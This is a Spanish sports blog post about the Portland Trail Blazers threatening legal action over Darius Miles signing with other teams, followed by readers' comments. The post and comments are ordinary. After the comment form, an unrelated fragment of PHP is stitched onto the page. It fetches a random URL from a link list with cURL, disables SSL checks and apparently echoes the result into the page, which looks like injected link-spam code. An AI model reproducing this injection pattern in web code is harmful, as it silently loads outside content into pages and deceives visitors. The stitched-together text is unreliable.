El caso Miles

09 de January de 2009 por MagicJohnson32

dmilesEn las últimas horas Sports Illustrated ha publicado una información en la que se asegura que los Blazers han tomado una inusual iniciativa: avisar a todas las franquicias de la liga de que están dispuestos a ir a los tribunales contra aquel que contrate y haga jugar a Darius Miles. La historia previa es sencilla y más o menos conocida por todos: los Blazers firmaron en el verano de 2004 un contrato a Miles por el que el jugador cobraría 9 millones de dólares tanto ésta como la próxima temporada. Sin embargo, el alero sufrió una lesión de rodilla en 2006 que le obligó a pasar por quirófano, tras lo cual no regresó a las canchas y fue cortado por los Blazers el pasado abril, cuando se determinó que dicha lesión le impediría volver a jugar.

Pero Miles ha vuelto. Primero fueron los Celtics y más tarde, los Grizzlies, quienes le contrataron. En total, Miles ha jugado 8 partidos esta temporada. En caso de jugar dos más, automáticamente se reinstauraría el contrato que en su día le firmaron los Blazers, con lo que éstos volverían a encontrarse por encima del límite salarial y verían reducidas sus posibilidades de realizar alguna incorporación importante en el mercado de agentes libres del próximo verano. Así que es posible que cualquier franquicia se plantee la contratación de Miles con el único objetivo de perjudicar a los Blazers.

Éste es el texto que los Blazers han hecho llegar al resto de franquicias:

“Team Presidents and General Managers,

“The Portland Trail Blazers are aware that certain teams may be contemplating signing Darius Miles to a contract for the purpose of adversely impacting the Portland Trail Blazers Salary Cap and tax positions. Such conduct from a team would violate its fiduciary duty as an NBA joint venturer. In addition, persons or entities involved in such conduct may be individually liable to the Portland Trail Blazers for tortuously interfering with the Portland Trail Blazers’ contract rights and perspective economic opportunities.

“Please be aware that if a team engages in such conduct, the Portland Trail Blazers will take all necessary steps to safeguard its rights, including, without limitation, litigation.”

El agente de Miles ha señalado que no ha leído la carta y no ha querido pronunciarse al respecto, pero de confirmarse parece probable que sea el jugador quien denuncie a la franquicia por los evidentes perjuicios que esta acción pueda ocasionarle.

milesportland

Comenta

11 comentarios a esta entrada

  1. Txusma dice:
    #1

    Complicado caso pq veo que tanto Miles como los Blazers tienen razon. Desde el punto de vista Blazer esta clarisimo que se sienten en peligro pq cualquier franquicia por 4 miseras perrras puede quitarse de un plumazo a un rival importante en las negociaciones veraniegas. Y dsd el punto de vista de Darius Miles no hace falta ningun tipo de explicacion. Ahora mismo no hay presuncion de inocencia para la franquicia que quiera contar con los servicios de Miles aunq si Memphis lo ha cortado por algo sera…
    Creo que la NBA deberia estudiar este caso con interes para que no suceda algo parecido en el futuro.

      Citar

  2. MagicJohnson32 dice:
    #2

    Por un lado, sí, es complicado.

    Pero por otro, leches, que fueron los Blazers quienes le firmaron ese contrato. Y si Miles está en condiciones de jugar, y juega, pues es lo que hay.

      Citar

  3. Txusma dice:
    #3

    ¿Que significa en condiciones de jugar? Si significa que puede correr de un lado a otro de la cancha al mismo ritmo que sus compañeros durante un maximo de 10 minutos pues claro que esta en condiciones…
    Pero vaya, que no hace falta ser muy listo para ver que si cualquier franquicia le hace un contrato de 10 dias, le hace jugar 4 minutos en 2 partidos y no le renueva, no es porque aporte mucho al equipo precisamente.

      Citar

  4. Pow_Brolin dice:
    #4

    Hay decenas de jugadores al cabo de una temporada que firman contratos de 10 dias y no juegan o son utilizados por los equipos mucho mas que esos 4 minutos en 2 encuentros.
    Puede haber todas las suspicacias que quieran pero como comenta Magic nadie obligo a Portland ofrecer ese contrato a Darius. En resumen mala gestion por ellos tanto por actitud (dichosa carta) como economica (en la firma y rescision de contrato)

      Citar

  5. xapa_croack dice:
    #5

    Sintiendolo por los blazers creo k no tienen razon.

      Citar

  6. Txusma dice:
    #6

    Parece ser que la NBA ha enviado en un su reporte diario a todas las franquicias, aparte de la informacion de que Darius Miles era agente libre, lo siguiente:
    “La NBA ha recibido el mensaje que Portland ha enviado al resto de franquicias. Segun las normas de la liga, todas las franquicias son libres de firmar a Darius Miles si lo desean y cualquier contrato sera aprovado por la NBA”.
    El original

    Así que queda clara la postura del comisionado no?

      Citar

  7. MagicJohnson32 dice:
    #7

    Es que la NBA no puede tomar otra postura que ésa. ¿Qué iba a decir, que apoyará a los Blazers en su causa contra cualquier franquicia que fiche a un agente libre? Igual tienen suerte y nadie ficha a Miles pero si no, a pringar y a pagar.

      Citar

  8. kantonyo dice:
    #8

    Soy fan de Blazers, pero creo que se estan equivocando.

    Lo más importante de todo debe ser el derecho y la libertad de cualquier deportista o ciudadano de trabajar donde pueda o donde le quieran. No creo que Blazers deba prohibir a nadie contratar a quien le apetezca, más aún cuando ellos no quieren a ese jugador en sus filas ni le harían jugar ni un solo minuto. Por lo tanto, no conozco las leyes americanas, pero dado que tienen una de las constituciones mas progresistas y con mas derechos del mundo no creo que les de la razon ningun tribunal.

      Citar

  9. César dice:
    #9

    Portland no tiene NINGUNA razón. De hecho, se ha beneficiado injustamente hasta el momento.

    Me explico, puesto que se declaró a Miles con lesión del tipo “career-ending” , el resto de su sueldo lo ha pagado el seguro, además de haber estado fuera del límite salarial hasta el momento, habiendo así tenido la opción de firmar jugadores. Ahora se descubre que Miles está para jugar, y éstos protestan?

    En mi opinión, el hecho de que se le declarara “acabado” antes de tiempo fue una estafa a la nba y al resto de equipos, puesto que se está comprobando que no lo estaba.

      Citar

  10. Jabho dice:
    #10

    Bienvenido Cesar.

    El asunto parece claro, los Blazers se equivocan. Y como decís, si le fichan por 10 días no es el primero ni el último, así que poco podrán hacer los Blazers.

      Citar

  11. Txusma dice:
    #11

    Los Grizzlies han firmado a Miles un contrato de 10 dias…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>